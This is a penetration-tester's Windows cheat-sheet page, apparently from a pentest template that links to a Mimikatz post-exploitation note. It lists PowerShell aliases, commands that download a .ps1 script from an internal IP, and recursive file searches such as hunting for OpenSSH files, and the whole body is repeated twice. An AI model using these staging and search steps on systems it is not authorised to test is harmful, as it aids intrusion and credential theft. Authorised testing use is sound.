Windows

# Also See [Mimikatz](Z/Templates/Pentest%20Template/4.%20Post%20Exploitation/Mimikatz.md) # PowerShell aliases | Cmdlet | Alias | | | ------------- | ---------- | --- | | Get-ChildItem | gci,ls,dir | | | Get-Content | gc | | | | | | # Common Tasks | Activity | Command | | | --------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------- | --- | | Download a file | ```Invoke-WebRequest -Uri "http://172.16.1.100/file_name.ps1" -OutFile "file_name.ps1"``` | | | Download a file | ```$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("https://www.contoso.com/file_name","C:\\out\\file")``` | | | Read file contents with PowerShell | ```Get-Content filename``` | | | Read file contents with cmd | ```type filename``` | | | List directory contents with cmd | ```dir /a``` | | | List directory contents with PowerShell | ```Get-ChildItem -Force .\dir ``` | | | | | | # File Searching | Description | Command | | | ------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------ | --- | | Filename Match With Powershell | ```Get-ChildItem c:\ *openssh* -Force -Recurse -ErrorAction 'silentlycontinue' | Where { !($_.Attributes -match "ReparsePoint") }``` | | | finstr.exe as grep | ```findstr /spin /c:"string" c:\``` | | | Powershell as grep | ```Select-String -pattern "<pattern>" -path "<path>" ``` | | # Also See [Mimikatz](Z/Templates/Pentest%20Template/4.%20Post%20Exploitation/Mimikatz.md) # PowerShell aliases | Cmdlet | Alias | | ------------- | ---------- | | Get-ChildItem | gci,ls,dir | | Get-Content | gc | | | | # Common Tasks | Activity | Command | | | --------------------------------------- | -------------------------------------------------------------------------------------------------------------------------------- | --- | | Download a file | ```Invoke-WebRequest -Uri "http://172.16.1.100/file_name.ps1" -OutFile "file_name.ps1"``` | | | Download a file | ```$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("https://www.contoso.com/file_name","C:\\out\\file")``` | | | Read file contents with PowerShell | ```Get-Content filename``` | | | Read file contents with cmd | ```type filename``` | | | List directory contents with cmd | ```dir /a``` | | | List directory contents with PowerShell | ```Get-ChildItem -Force .\dir ``` | | | | | | # File Searching | Description | Command | | | ------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------ | --- | | Filename Match With Powershell | ```Get-ChildItem c:\ *openssh* -Force -Recurse -ErrorAction 'silentlycontinue' | Where { !($_.Attributes -match "ReparsePoint") }``` | | | finstr.exe as grep | ```findstr /spin /c:"string" c:\``` | | | Powershell as grep | ```Select-String -pattern "<pattern>" -path "<path>" ``` | |